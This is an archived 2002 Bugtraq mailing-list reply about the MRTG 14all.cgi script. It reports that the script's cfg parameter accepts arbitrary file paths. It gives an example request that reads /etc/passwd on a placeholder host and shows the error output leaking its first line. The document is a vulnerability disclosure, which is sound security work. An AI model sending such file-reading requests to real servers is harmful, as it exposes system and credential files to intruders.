[24233] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Mrtg Path Disclosure Vulnerability

daemon@ATHENA.MIT.EDU (Jason Hicks)
Sun Feb 10 03:48:01 2002

Message-Id: <sc63b65d.098@mail.natfuel.com>
Date: Fri, 08 Feb 2002 11:28:22 -0500
From: "Jason Hicks" <HicksJ@NATFUEL.COM>
To: <Bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Actually, it does not display the webroot directory... it lists the location
where 14all.cgi is configured to look for the config files.  In your case that
may be the webroot, but not in mine.

BUT... Better yet, 14all.cgi allows (accepts) path entries in the web
request... (a slight no no)

Example:
http://mrtghost/cgi-bin/14all.cgi?cfg=/etc/passwd

Anyone care to guess what this returns?

}Software error:
}ERROR: CFG Error Unknown Option "root:x:0:0:root:/root" on line 2 or
}above. Check doc/reference.txt for Help 
}
}For help, please send mail to the webmaster (x), giving
}this error message and the time and date of the error. 

Luckily my /etc/shadow is not readable!  :)

Nothing like giving away the first line of _any_ readable file on your system....

Jason Hicks
Network Architect
National Fuel - Buffalo, NY


home help back first fref pref prev next nref lref last post